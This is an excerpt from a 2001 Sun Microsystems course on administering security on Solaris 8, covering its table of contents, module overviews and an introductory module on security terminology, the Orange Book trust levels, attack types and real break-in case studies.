Using OpenSSH Clients ............................................................... 16-23Determining Known Hosts.................................................. 16-25Generating Client Keys ........................................................ 16-27Granting Access to Other Users.......................................... 16-29Using OpenSSH With RSA Authentication ...................... 16-30Using the ssh-agent Program ........................................... 16-31Using the Secure FTP Client ................................................ 16-33Configuring the Client ......................................................... 16-35

Exercise: Using Secure Shell ......................................................... 16-38Preparation............................................................................. 16-38Task – Using Secure Shell .................................................... 16-38Task – Installing OpenSSH .................................................. 16-38Task – Using OpenSSH ........................................................ 16-38

xx Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Task – Checking Secure Shell Encryption ......................... 16-39Task – Configuring Client Keys.......................................... 16-40Task – Using the ssh-agent Program............................... 16-40


Installing OpenSSH .............................................................. 16-42Using OpenSSH..................................................................... 16-42Checking Secure Shell Encryption...................................... 16-44Configuring Client Keys ...................................................... 16-46Using the ssh-agent Program ........................................... 16-47

Securing Physical Access ............................................................ 17-1Objectives ......................................................................................... 17-1Relevance........................................................................................... 17-2Additional Resources ...................................................................... 17-3Assessing the Risk From Physical Intrusion ............................... 17-4

Physical Intrusion Solutions.................................................. 17-5Types of Physical Intrusion ................................................... 17-6Securing IT Equipment .......................................................... 17-8Implementing Physical Network Security ........................ 17-10Securing Network Infrastructure........................................ 17-11Appraising the Risk of Eavesdropping.............................. 17-13Using Encryption .................................................................. 17-15Strengthening Help Desk Processes................................... 17-17User Authentication Techniques ........................................ 17-18

Applying Physical Security Measures ........................................ 17-20The Stop-A Key ..................................................................... 17-21Disabling the Stop-A Key .................................................... 17-22Enabling EEPROM Security ................................................ 17-23EEPROM Passwords............................................................. 17-26

Exercise: Working With Physical Security ................................. 17-28Preparation............................................................................. 17-28Task – Disabling the Stop-A Key ........................................ 17-28Task – Considering the Physical Security of Your

Systems ................................................................................ 17-28Exercise Summary.......................................................................... 17-29Exercise Solutions .......................................................................... 17-30

Disabling the Stop-A Key .................................................... 17-30Considering the Physical Security of Your Systems ........ 17-30

Connecting the Enterprise Network to the Outside World ........ 18-1Objectives ......................................................................................... 18-1Relevance........................................................................................... 18-2Additional Resources ...................................................................... 18-3Designing the Network to Improve Security............................... 18-4

Improving Security With a Firewall..................................... 18-5Using Solaris SunScreen Firewall ......................................... 18-7

xxiCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Evaluating IPsec as a Firewall Replacement....................... 18-8Using Routing Security Features ........................................ 18-10Masking Hosts Using a Proxy Server................................. 18-12Securing Routers, Proxy Servers, and Firewalls............... 18-14Creating Demilitarized Zones (DMZ)................................ 18-16Providing Secure Access Using a Virtual Private

Network............................................................................... 18-17Sample Architectures............................................................ 18-19

Running Enterprise Security Audits ........................................... 18-21Running Trial Attacks .......................................................... 18-22Using Third Parties to Run Trial Attacks .......................... 18-22

Applying Ongoing Network Security Measures...................... 18-24Identifying Ongoing Tasks .................................................. 18-25

Keeping Current With Security Issues........................................ 18-28Identifying Information Sources......................................... 18-29

On-Line Security Resources ..........................................................A-1Advisory and Certification Bodies ................................................ A-1

CERT .......................................................................................... A-1INFOSEC - Information Systems Security

Organization .......................................................................... A-1Computer Security Technology Center ................................ A-2

Security Standards ............................................................................ A-3Common Criteria ..................................................................... A-3National Security Agency (NSA)........................................... A-3CSRC – Computer Security Division .................................... A-3ITSEC (Europe)......................................................................... A-4IEEE Computer Society ........................................................... A-4IETF ............................................................................................ A-4The Open Group ...................................................................... A-5

Useful Web Sites................................................................................ A-6Sun Security Coordination Team........................................... A-6The Computer Incident Advisory Center ............................ A-6Computer and Internet Security Resources ......................... A-6Computer Security Institute ................................................... A-7InfoWar.com ............................................................................. A-7InfoWorld.com ......................................................................... A-7Risks Digest............................................................................... A-7SecurityFocus.com ................................................................... A-8Security Portal .......................................................................... A-8SecuritySearch.net.................................................................... A-8SecurityStats.com ..................................................................... A-8USENIX...................................................................................... A-8

xxii Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Solaris OE Security Tools Summary..............................................B-1The Trusted Solaris™ 8 OE.............................................................. B-1

Security Extensions...................................................................B-1The SunScreen™ Firewall Product.........................................B-2SKIP.............................................................................................B-3IPsec ............................................................................................B-3Sun Enterprise Authentication Mechanism (SEAM) ...........B-4Pluggable Authentication Modules (PAM)...........................B-4Sun Enterprise Network Security Service (SENSS)..............B-5Solaris OE Fingerprint Database.............................................B-5PATCHDIAG.............................................................................B-5ASET ...........................................................................................B-6

Third-Party Security Tools ..............................................................C-1SAINT (SATAN/SARA) ......................................................... C-1Courtney.................................................................................... C-2Gabriel ....................................................................................... C-3TripWire .................................................................................... C-3Top ............................................................................................. C-3TCP Wrappers .......................................................................... C-3Crack .......................................................................................... C-4John the Ripper......................................................................... C-4AntiCrack .................................................................................. C-4The npasswd Command.......................................................... C-5Secure Shell (SSH).................................................................... C-5The nmap Utility........................................................................ C-6Titan ........................................................................................... C-7COPS .......................................................................................... C-7Tiger ........................................................................................... C-7The dsniff Sniffer................................................................... C-8The sudo Utility........................................................................ C-8Cerberus Internet Scanner (CIS) ............................................ C-8Nessus........................................................................................ C-8Whisker...................................................................................... C-9The tcpdump Tool .................................................................. C-10

SWATCH......................................................................................... C-10Pretty Good Privacy (PGP)........................................................... C-10Kerberos........................................................................................... C-10Virtual Private Networks.............................................................. C-11Anti-Sniffing Tools......................................................................... C-11

Security Recommendations............................................................D-1

Index...........................................................................................Index-1

Preface-iCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Preface

About This Course

Course Goals

In this course, system security is covered at two main levels: the physicalsecurity of the systems, covering access to systems and networks, and theprotection of the system data.

This course provides you with the practical skills required to implement,administer, and maintain a secure Solaris™ Operating Environment(Solaris OE). This course should enable you to do the following:

● Control authorized and unauthorized access to a computer ornetwork

● Manage computer users and accounts

● Apply data copy protection, including database information

● Defend against viruses, worms, and other hacks

Course Map

Preface-ii Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Course Map

The following course map shows the structure of the course. This enablesyou to track your progress with reference to the course goals.

Module-by-Module Overview

About This Course Preface-iiiCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C


This course contains the following modules:

● Module 1, “Security Overview”

This module explores what security means in computing terms, anddefines the required security terminology. Different types of securityviolation are identified, and the most likely sources of those securityviolations explained.

● Module 2, “Using Solaris™ OE Log Files”

This module explores the logging and tracing capabilities that canhelp to monitor and detect security breaches. The key security logfiles found on Solaris OE are described, and their locations given.

● Module 3, “The Solaris OE Basic Security Module”

This module explains the role of the Basic Security Module (BSM) inauditing and controlling system usage. In this module, you configureand use UNIX® auditing through BSM and use BSM to managedevices.

● Module 4, “Security Attacks”

This module looks in detail at some common types of system attack.

The objectives and mechanisms of Trojan horse attacks areexamined, and the purpose of rootkits is described. Various otherback door strategies are explained.

● Module 5, “Administering User Accounts Securely”

This module explains how to add, maintain, and delete useraccounts securely. It also shows how to configure tools to check for orprevent user security violations.

This module also shows how to configure restricted shells for users tolimit the danger from compromised accounts.

● Module 6, “Password Security”

This module explains how to configure and use password crackingtools to find weak passwords.


Preface-iv Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

● Module 7, “Securing Root Access”

This module shows you how to configure and use Solaris OE Role-Based Access Control (RBAC). It also explains how to configure anduse the sudo utility to allow privileged users to obtain extra privilegefor specified tasks.

● Module 8, “File System Attacks”

This module shows how to configure disk partitions and slices toimprove security. It also describes how to determine and enforce thecorrect file permissions and ownership.

The implications of the set-user-id (SUID), set-group-id (SGID), andsticky bits are explored. The use and configuration of access controllists to protect system resources is examined.

Finally, this module investigates security issues connected withbackup and restore strategies.

● Module 9, “Auditing File Systems”

This module explores the role of file system auditing, and shows howto use TripWire to fingerprint a file system to help detect file systemattacks.

● Module 10, “Attacking Network Data”

This module describes the use of network sniffing and commonsniffer tools, such as the dsniff and snoop utilities. It analyzes howsuch tools compromise user data and passwords carried over thenetwork.

This module also examines common network service attacks andnetwork-based denial-of-service (DoS) attacks.

● Module 11, “Securing Network Data”

Encryption counteracts network sniffing. This module investigatesthe need for the encryption of network data, and then shows howsuch encryption can be implemented for Transmission ControlProtocol/Internet Protocol (TCP/IP)-based connectivity using IPsec.

● Module 12, “Analyzing Network Services”

There are tools that scan systems and networks, looking for knownvulnerabilities. This module looks at the capabilities of such tools,and focuses on the most popular one—Security Administrator’sIntegrated Network Tool (SAINT). It shows how to monitor andmanage network services using SAINT, and how to configure theCourtney application to detect SAINT-style attacks.


About This Course Preface-vCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

● Module 13, “Security Network Services”

This module shows you how to determine and disable unnecessarynetwork services. It covers the correct setup of Berkeley r commandsand file transfer protocol (FTP), and explains the use of the chrootcommand for increased security.

This module also describes the role of authentication tools, such asPlugable Authentication Module (PAM) and Sun EnterpriseAuthentication Mechanism (SEAM).

● Module 14, “Hardening the System”

This module examines the concepts of system hardening, and showshow to configure and use tools such as Titan and ASET to performsystem hardening.

● Module 15, “Authenticating Network Services”

This module shows you how to configure and use TCP Wrappers.

● Module 16, “Securing Remote Access”

This module shows you how to configure and use Secure Shell(SSH).

● Module 17, “Securing Physical Access”

This module describes the need for physical security, and explainssome of the counter-measures that can be applied. Specifically, itshows how to disable the STOP-A key, and explains how thisenhances physical security. It also shows how to set electricallyerasable, programmable, read-only memory (EEPROM) passwords.

● Module 18, “Connecting the Enterprise Network to the OutsideWorld”

This module examines wider network security issues and explainsthe role of firewalls, proxy servers, and so on. It looks at securityissues specific to routers, and how these might compromise security.

This module also describes the ongoing security tasks that arenecessary to keep a network of systems secure. Common sources ofsecurity information are listed, and where the latest security issuesand patches can be found.

Course Objectives

Preface-vi Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Course Objectives

Upon completion of this course, you should be able to:

● Discuss the need for computer security and list the commonterminology for describing information technology (IT) security

● Use standard Solaris OE logging and auditing facilities to monitorattempted and successful security attacks

● Configure user accounts in a secure manner

● Advise users on good password policy and identify user accountswith insecure passwords

● Configure files, directories, and devices in a secure manner andimplement secure user access to file system services

● Fingerprint a file system for detecting potential security attacks

● Describe the vulnerabilities of an IT network

● Encrypt data transmitted over the network

● Configure network services to secure the network againstunauthorized access

● Describe the need for controlled physical access to IT equipment

● Discuss the means of securing access to all aspects of an enterprise ITconfiguration

Topics Not Covered

About This Course Preface-viiCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Topics Not Covered

This course does not cover the following topics:

● Solaris OE administration. This is covered in the following twocourses offered by Sun Educational Services:

● SA238 or WSB238: Solaris™ 8 Operating Environment SystemAdministration I

● SA288 or WSB288: Solaris™ 8 Operating Environment SystemAdministration II

● Transmission Control Protocol/Internet Protocol (TCP/IP) networkadministration. This is covered in the following course offered by SunEducational Services:

● SA389 or WSB389: Solaris™ 8 Operating Environment TCP/IPNetwork Administration

How Prepared Are You?

Preface-viii Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

How Prepared Are You?

To be sure you are well prepared to take this course, can you answer yes tothe following questions:

● Can you add user accounts to Solaris OE?

● Can you configure basic TCP/IP to connect a Solaris OE workstationto a corporate network?

● Can you install a Solaris OE workstation or server?

Introductions

About This Course Preface-ixCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Introductions

Now that you have been introduced to the course, introduce yourself tothe other students and the instructor, addressing the items shown on theoverhead.

How to Use Course Materials

Preface-x Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

How to Use Course Materials

To enable you to succeed in this course, these course materials use alearning model that is composed of the following components:

● Course map – An overview of the course content is shown under“Course Map” on page Preface-ii so you can see how each modulefits into the overall course goal.

● Objectives – What you should be able to accomplish aftercompleting each module is listed at the beginning of each module.

● Relevance – This section, which appears in every module, providesscenarios or questions that introduce you to the informationcontained in the module and provoke you to think about how thecontent of the module relates to the application of security in general,and Solaris OE in particular.

● Lecture – The instructor presents information specific to the topicof the module. This information helps you to acquire the knowledgeand skills necessary to succeed with the exercises.

● Exercise – Lab exercises give you the opportunity to practice yourskills and apply the concepts presented in the lecture.

Course Icons and Typographical Conventions

About This Course Preface-xiCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C


The following conventions are used in this course to represent varioustraining elements and alternative learning resources.

Icons

Additional resources – Indicates other references that provide additionalinformation on the topics described in the module.

Note – Indicates additional information that can help students but is notcrucial to their understanding of the concept being described. Studentsshould be able to understand the concept or complete the task without thisinformation. Examples of notational information include keywordshortcuts and minor system adjustments.

Caution – Indicates that there is a risk of personal injury from anonelectrical hazard, or risk of irreversible damage to data, software, orthe operating system. A caution indicates that the possibility of a hazard(as opposed to certainty) might happen, depending on the action of theuser.

Warning – Indicates that either personal injury or irreversible damage ofdata, software, or the operating system will occur if the user performs thisaction. A warning does not indicate potential events; if the action isperformed, catastrophic events will occur.


Preface-xii Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Typographical Conventions

Courier is used for the names of commands, files, directories,programming code, and on-screen computer output, for example:

Use dir to list all files.system% You have mail .

Courier is also used to indicate programming constructs, such as classnames, methods, and keywords; for example:

The getServletInfo method is used to get author information.The java.awt.Dialog class contains Dialog constructor.

Courier bold is used for characters and numbers that you type; forexample:

To list the files in this directory, type:# dir

Courier bold is also used for each line of programming code that isreferenced in a textual description; for example:

1 import java.io.*;2 import javax.servlet.*;3 import javax.servlet.http.*;

Notice thejavax.servlet interface is imported to allow access to its life cyclemethods (line 2).

Courier italics is used for variables and command-line placeholdersthat are replaced with a real name or value; for example:

To delete a file, use the del filename command.

1-1Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Module 1

Security Overview

Objectives

Upon completion of this module, you should be able to:

● Describe basic system security, its manifestations, and the sourcesand implications of poor security

● Explain what security means in computing terms

● Explain why system security is important

● Recognize security terminology

● Identify different types of security violations

● Describe the most likely sources of security violations

● Describe the need for security policy

● Recognize the difference between prevention of security violationsand fixing after the event

● Explain how to obtain and build third-party security tools

Relevance

1-2 Administering Security on the Solaris™ 8 Operating EnvironmentCopyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C

Relevance

?!

Discussion – The following questions are relevant to understanding whatsystem security is all about:

● Why do computer systems need security?

● What would happen if all users had unrestricted access to allsystems?

● How can administrators tighten security on their systems?

Additional Resources

Security Overview 1-3Copyright 2001 Sun Microsystems, Inc. All Rights Reserved. Enterprise Services, Revision C


Additional resources – The following references provide additionalinformation on the topics described in this module:

● Schneier, Bruce. Secrets & Lies.John Wiley & Sons, 2000.

● Scambray, McClure, Kurtz. Hacking Exposed.Osborne McGraw-Hill,2001.

● Stoltz, Clifford. The Cuckoo’s Egg. Pocket Books, 1995.

● Bell, D.E. and LaPadula, L.J. Secure Computer Systems: UnifiedExposition and Multics Interoperation, MTR-2997 Rev. 1, MITRECorporation, Bedford Massachusetts, March 1976.

● Network Working Group – Request for Comments: 2196 “SiteSecurity Handbook”[http://www.cis.ohio-state.edu/cgi-bin/rfc/rfc2196.html ],accessed 14 May 2001.

● Department of Defense, Trusted Computer System Evaluation Criteria,(DOD-5200.28-STD)[http://www.radium.ncsc.mil/tpep/library/rainbow/5200.28-STD.html ][http://www.dynamoo.com/orange/ ]

Tool Downloads

● GNU Zip as an SVR4 package,[http://www.sunfreeware.com ]

● GNU C++ Compiler as an SVR4 package,[http://www.sunfreeware.com ]

● GNU Make as an SVR4 package,[http://www.sunfreeware.com ]

● Perl as an SVR4 package,[http://www.sunfreeware.com ]

Understanding Security



In this course, system security is presented at two levels: the physicalsecurity of the systems, including access to systems and networks, and theprotection of the system data.

Computer security includes the following:

● Controlling authorized and unauthorized access to a computer ornetwork

● Managing computer users and accounts

● Protecting data, including database information

● Defending against viruses, worms, and other malicious attacks

● Controlling physical access to IT systems



Security and UNIX®

The original UNIX® operating system was not designed with the levels ofsecurity that most corporate and educational users now demand. TheUNIX developers wrote the operating system in an environment wheresecurity, as we understand the term today, was not the prevailing concern.Their focus was to design a system where users or wayward programswere prevented from accidentally interfering with each other. Preventingmalicious damage was not a consideration.

However, they did incorporate a security system that controls:

● User access to the system

● The way users and programs access files

● Access to system resources

Unfortunately, this security system does not prevent users from writingprograms with flaws that can deliberately or accidentally bypass thesesecurity controls. In fact, nearly all of the security holes in UNIX are thefault of bad programing rather than a flaw in the basic design philosophy.



Security Is Partly a Matter of Education

As the person responsible for implementing security in your UNIXenvironment, you might have encountered people in your usercommunity who are reluctant to implement stricter security measures.Users might be accustomed to sharing data and programs, and they mighthave free access to compilers and system devices (this might beparticularly true in a research environment). The tradition of open accessin UNIX is a strong one. Therefore, in your workplace you might havetwo security tasks rather than one:

● Secure your UNIX environment to a level appropriate for thesensitivity of the data or the importance of the applicationenvironment.

● Educate your user community to respect and accept the level ofsecurity required so that the first task can be achieved. Higher levelsof security impact ease of use—educate your users to accept therestrictions rather than unilaterally impose the restrictions.



UNIX Software

The open nature of UNIX resulted in an initial popularity that meantmuch of the UNIX operating system and its utilities were written byusers, not system designers. These were often university students orsoftware developers at research labs, who developed the software at atime when sophisticated engineering tools and techniques were notavailable. Many bugs were introduced into UNIX because of this lack ofcoherent design and rigorous testing.

Many of the original security flaws have been found and fixed. However,when new software is written, new security holes are found. It is,therefore, important to keep track of the latest security bulletins and toinstall operating system and application patches as they are released.

Examples of Break-Ins



The following examples are real attacks made on organizations. Theseexamples illustrate how easy it is to mount an attack and how fast theattackers’ intrusion can spread from the initial system to whole networks.The examples also show how damaging and costly even a seeminglyharmless attack can be.

Chronology of a Host Compromise

At 12 noon on July 19, 1995, a team of intruders attacked an organization'scomputer system – a system on which the intruders already had validuser accounts. Then intruders exploited their knowledge of theorganization’s personnel. Their goal was to obtain the root password forthe organization's primary UNIX server, and from there, to wreak havoc.

At 1 p.m., using administrative privileges at another site, the intruderscreated a user account at that site with the same account and user name asthe system manager of the target organization. The intruders sent anemail message from this fake account to one of the system administratorsin the target organization, asking for the server root password.

At 3:11 p.m., the system administrator replied to the spoofed emailmessage and provided the real root password. The system administrator,replying out of the email system elm , did not see the mail header and wasunaware that this message did not originate from the system manager.

At 3:12 p.m., the intruders logged in to the primary server of the targetorganization using the account of another system administrator, whosepassword they had sniffed earlier. They logged in as root using thepassword they had received in the email reply. They changed the rootpassword and the password of the system administrator's account thatthey used to log in. They removed other user accounts and even changedthe electrically erasable programmable read-only memory (EEPROM)password using the eeprom command. Finally, the intruders attackedother machines on the organization's network and destroyed security andadministrative functions.

Sometime before 4 p.m., the system administration team discovered thatthey could not log in. They noticed a message on a client machine consoleindicating that an unprivileged user had successfully used the sucommand to access the root account. They also found that the EEPROMpassword was changed on the server.



At 4:12 p.m., they decided to power off their machines.

On the next day, July 20, the system administration team struggledunsuccessfully to recover.

By July 21, they decided to perform a complete reinstallation of all Sun™workstations with an upgrade from SunOS™ to the Solaris™ 2.4 O.E.

On July 24, their machines were operational, and user accounts wererestored on July 25.

On July 31, one of the client machines was compromised again by thesame team of intruders.

This is an actual incident. The individuals who performed this attack(Texas A&M University graduate students completing a computersecurity laboratory exercise) were later identified. Instead of beingprosecuted, they were rewarded. The attack was real, but it was made in acontrolled environment as part of a graduate-level computer securitycourse.

This example highlights several lessons for all security administrators:

● Guile and subterfuge were used to accomplish the initial securitybreach.

● The initial intrusion quickly led to the compromise of a large part ofthe network.

● In contrast to the speed of the attack, it took a long time to restorethe systems back to a secure state.

Western Union

On September 9, 2000, Western Union warned thousands of onlinecustomers that hackers had broken into the company's Web site. Althoughno fraudulent transactions or breaches of personal information werediscovered, the penetration could have affected online users. More than10,000 customers were alerted, suggesting that they cancel their credit anddebit cards. The Web site was out of service that evening, and remainedthat way for several days.

In this example, an intrusion, which apparently did no damage, causedWestern Union a huge loss of business and customer trust.



Nuclear Power Station

In June 1999, a guard employed to protect a nuclear power stationattempted to sabotage the site's computers. The guard triggered ahigh-level security alert leading to a shutdown of the station's automaticaccess control system, electronically locking doors to close the station, ascolleagues began searching for an intruder.

The guard is believed to have hacked into the station’s computer systemto alter sensitive information. An employee said:

“He got into one of the systems and wiped the records. The securitypeople are still very touchy when we try to find out exactly whathappened.”

The incident was so serious that a working party was formed to reviewsecurity and tough, new security checks were imposed at nuclear powerstations.

This example underscores how disgruntled employees can pose a severerisk to system security.

Travelocity

In January 2001, a security breach at Travelocity exposed the personalinformation of up to 51,000 of the online travel company's customers whohad participated in a site promotion. Customer names, addresses, phonenumbers, and email addresses were revealed because of an inadequatelyprotected directory, perhaps for up to a month. The replacement of serversin San Francisco with new ones in Tulsa caused this breach.

This example shows that sometimes companies make things easy for thehacker to gain access to individuals’ private information.

FTP Server

In April 2001, PGP Security’s Computer Vulnerability EmergencyResponse Team (COVERT) notified three vendors that new vulnerabilitieshad been discovered in their file transfer protocol (FTP) server software.The security holes could allow a hacker to break into the servers, stealdata, deface Web sites, or substitute false data for information a companyprovides to its customers.



FTP servers are used by more than 90 percent of all enterprise networks toshare data with employees, partners, and customers, and the vulnerabilitycould affect a significant portion of those networks. The COVERT lab isnot aware of any serious failures attributed to the vulnerability but, asnews of the security hole spread, it became almost a race to see if vendorscould patch their systems before they were exploited.

This example shows that even security experts sometimes get it wrong.

Yahoo! Web Server

In February 2000, the Yahoo! Web portal site was the target of adistributed denial-of-service (DoS) attack which, at that time, was thehighest profile company to admit to being a victim of such an attack.

According to Yahoo!, the attack originated from 50 different InternetProtocol (IP) addresses and up to 1 Gbyte of requests per second floodedthe Yahoo! routers. According to a Yahoo! spokeswoman their routers:

“... experienced a coordinated, distributed denial-of-service attack atone of its California data centers which caused intermittent inabilityto access some, but not all, Yahoo! services.”

Yahoo! faces DoS attacks on a fairly regular basis, the companyspokeswoman said, but it normally can override the problem byre-routing resources. This was the first time the site was forced offline bysuch an attack.

The attack took the site offline for approximately three hours from about10:30 a.m. to 1:10 p.m. on a Monday. By Monday evening, the site hadfilters in place to block the attack and the network was running at fullpower. Yahoo! said it did not know who was responsible for taking thesite down.

Although Yahoo! refused to estimate how much the attack cost it in lostrevenue, analysts estimate the loss will add up to millions of dollars.

“You're talking about one of the biggest sites on the Web going downin the middle of the business day. That's pretty significant.”Malcolm Maclachlan, International Data Corp.

Security Terminology



Three terms traditionally define computer security:

● Confidentiality

● Integrity

● Availability

Confidentiality is concerned with privacy, or preventing users from readingsensitive information. In a military environment, the terms security andconfidentiality are often used synonymously.

While confidentiality covers unauthorized reading, integrity is concernedwith unauthorized writing. One definition of integrity is:

“Every piece of data is as the last authorized modifier left it.”

Data integrity ensures that the unauthorized modification or deletion ofdata is not permitted. Software integrity ensures that programs are notaltered by errors, malicious users, or viruses.



Availability means ensuring that attackers cannot prevent legitimate usersfrom accessing the system. Do not confuse this with the term used bysoftware and hardware vendors selling high availability, fault tolerantsoftware and systems, which has little to do with security.

Other terms that describe computer security are:

● Trusted Computing Base – The trusted computing base (TCB) definesthe protection mechanisms inside the computer (both hardware andsoftware) that implement the security policy.

● Reference Monitor – A reference monitor is a piece of software thatcontrols access to objects (files, devices, systems) by subjects1 (usersor programs). Typically a reference monitor is a small part of aprogram that is responsible for controlling access.

● Secure Kernel – A secure kernel refers to the hardware and softwareof the TCB that implements the reference monitor concept.

On some UNIX systems, executable files can be marked by the superuseras part of the TCB. Using a special trusted shell, only TCB files can beexecuted, making it more difficult for intruders to replace system files togain privileged access to the system.

1. The use of subjects and objects and their relationship are defined in the Bell-LaPadula model of computer security. See “Additional Resources” onpage 1-3.

The Orange Book


The Orange Book

The National Computer Security Center published a book in 1985 calledthe U.S. Department of Defense Trusted Computer System Evaluation Criteria.It is the standard for rating computer systems for security. The book isbetter known as The Orange Book. It defines four divisions and sevenlayers of trust in a computing environment (see Figure 1-1 on page 1-16).The divisions range from D (minimum security) to A (verified design).Each level includes all the security provisions of the preceding levels sothat every level builds on each other.

The Orange Book


The Orange Book


Figure 1-1 The Orange Book Seven Layers of Trust

The following are examples of how some of the Orange Book SevenLayers translate to common, well-known computer equipment andoperating systems:

● D – Typical stand-alone personal computer (PC)

● C1 – Typical out-of-the-box UNIX system

● C2 – Computer running the Solaris OE with BSM installed

● B1 – Trusted Solaris™ 8 OE

Common Terms

The following section defines common terms used in relation to computersecurity.

Minimal protection is provided; there are no security features.

Discretionary access control and access permissions are provided.Logins with passwords are required.

Auditing and authentication events are audited. Authenticationevents are kept in a secure place.

Mandatory access control and labeled output are provided. Accessis based on labels which designate security clearance.

Configuration control, facility management, and systemconfiguration must be documented and controlled. Alladministrative security and operator functions are separated.

Access control lists and full system documentation are provided.Access is based on lists of users plus labels.

Formal proof of the security of the system is required.

D

C1

C2

B1

B2

B3

A

The Orange Book


Identification and Authentication

Identification is a means of letting a third party (such as an IT system)know who you are. IT system identification can be:

● A login or account name

● A smart card or Enigma card

● The IP address of your own computer

● Caller ID used in conjunction with your phone

● A digital certificate provided by a trusted agent

No one of these is sufficient to ensure secure computer access because:

● Login names are easily acquired

● Cards are easily stolen

● IP addresses can be acquired and used by another computer

● Burglars can break in and use your phone

● Public keys for certificates can be falsified

The Orange Book


Authentication is the ability to prove who you are. In a secureenvironment, when you identify yourself to a computer it asks for furtherinformation to authenticate you. Means of authentication can include:

● Something you know, such as a password, personal identificationnumber, or pass phrase

● Something you have, such as a smart card or Enigma card

● Something about you, such as a fingerprint or retina scan

Although these examples are not totally foolproof, they are sufficient formost systems. Problems with these means of authentication include:

● Users give away passwords or choose obvious ones which can beguessed

● Smart cards can be stolen

● Hollywood movies demonstrate techniques (some realistic and somenot) for falsifying such personal attributes as fingerprints

The Orange Book


Authorization

Authorization ensures that:

● Authorized people can accomplish what they are authorized to do

● Unauthorized people cannot do what they should not do

Authorization is enforced by access control and confidentiality, which:

● Grants or denies access to data

● Restricts actions

● Controls who has access to what

● Provides assurance that sensitive data remains undisclosed

Examples of mechanisms that implement access control and enforceconfidentiality are:

● File and directory permissions

● Network connections and trusted hosts, where the host, all users ofthe host, and the network connection to the host, are implicitlytrusted as secure

The Orange Book


● Distributed file system shared access controls

● EEPROM security mode settings

● Encrypted data

Types of Security Attacks



Your systems can be attacked in many ways and for many reasons.Attacks are classified so that you can understand the types of measuresthat must to be taken to prevent or mitigate attacks.

Fraud and Theft

Flaws in electronic financial and commercial systems provide thepotential, and sometimes the irresistible urge, for criminal attack.Financial systems lose millions of dollars each year because of hacking,and techniques become more effective despite the fact that security alsobecomes more effective. Systems dealing with money (in any form)require an increased security focus because they are likely to receivepersistent attacks.



Theft of information also occurs because the theft of information can havea significant monetary value to a competitor or enemy. Intellectualproperty can also prompt attack because of its monetary value. Theft ofintellectual property is concerned with providing access to proprietarydata while maintaining control and receiving appropriate compensation,instead of keeping sensitive data private.

Terrorism and Sabotage

While fraud is primarily restricted to financial systems, any system mightbe attacked by terrorists or an employee looking to sabotage a system forrevenge. Revenge or malice are usually the motive for attacks of this kind.

Viruses, designed to cause damage to someone else’s property, are usuallyof this type. Sometimes the virus is targeted against a particular firm;sometimes the hacker is looking for maximum disruption to as manyorganizations as possible.

Bombs, or bomb threats, are another type of destructive attack. Becausemodern distributed systems are heavily dependent upon networking, theactual computer installation might not be the target; the networks are alsovulnerable. Network cables and telecommunications equipment are farmore accessible than computer data centers.

Note – An installation that could be subjected to serious threat from aterrorist attack requires significant amount of physical as well aselectronic defense. The discussion of how to defend against such a threatis beyond the scope of this course.

Sabotage by disgruntled employees can be difficult to prevent, especiallyif the person involved is in a position of trust. Techniques and tools in thiscourse can help to prevent the majority of sabotage attacks caused bymalicious individuals but these tools cannot entirely prevent trusted usersfrom sabotaging a system.

Privacy Violation

Privacy violation comes in two forms: targeted attacks, which can lead toidentity theft, and data harvesting.



Targeted Attack

In a targeted attack, the attacker wants to know everything about anindividual, company, or organization. Identity theft is using thatinformation illegally to impersonate the individual.

As more systems use electronic identification, identity theft is becomingmore common. Computer security helps protect information, whichmakes privacy violation harder. However, not all information is storedonline, so you must pay attention to hard and soft media, and ensure thatprintouts and backup media are also kept secure.

Data Harvesting

Data harvesting is the process of collecting names of people who might besusceptible to illegal scams. For example, an attacker might want to findall the widows age 70 or older, with one or more pets, and with more than$10,000 in the bank, in order to sell them a non-existent plot in a petcemetery.

Data harvesting is heavily automated because multiple databases areaccessible from the Internet. This automation is, however, also the key topreventing data harvesting. The process is only worthwhile if informationcan be easily obtained. Good computer security and moderate levels ofcryptography can protect against data harvesting.

Note – In many countries, data protection regulations define a citizen’srights to privacy and determine how they can access personal informationstored on computer systems. If your company operates in one of thesecountries, you must incorporate the data protection regulations in yoursecurity policy. If you fail to do so, your company might be prosecuted.

Publicity Attacks

Publicity attacks are designed to attract attention. While publicity attacksare usually not illegal or even directly damaging, they can cause a greatdeal of embarrassment and a loss of credibility. For example, in 1995,Berkeley graduates broke the Netscape™ Navigator encryption scheme.They did not exploit the information directly; they called The New YorkTimes, which damaged public confidence in Netscape™.



These attacks are often spread by individuals with time to spare. Do notunderestimate these hackers because they are often highly skilled andlooking for publicity, so the bigger the target the better. Your systemsmust be completely intruder proof to defeat these kinds of attacks.

Denial of Service

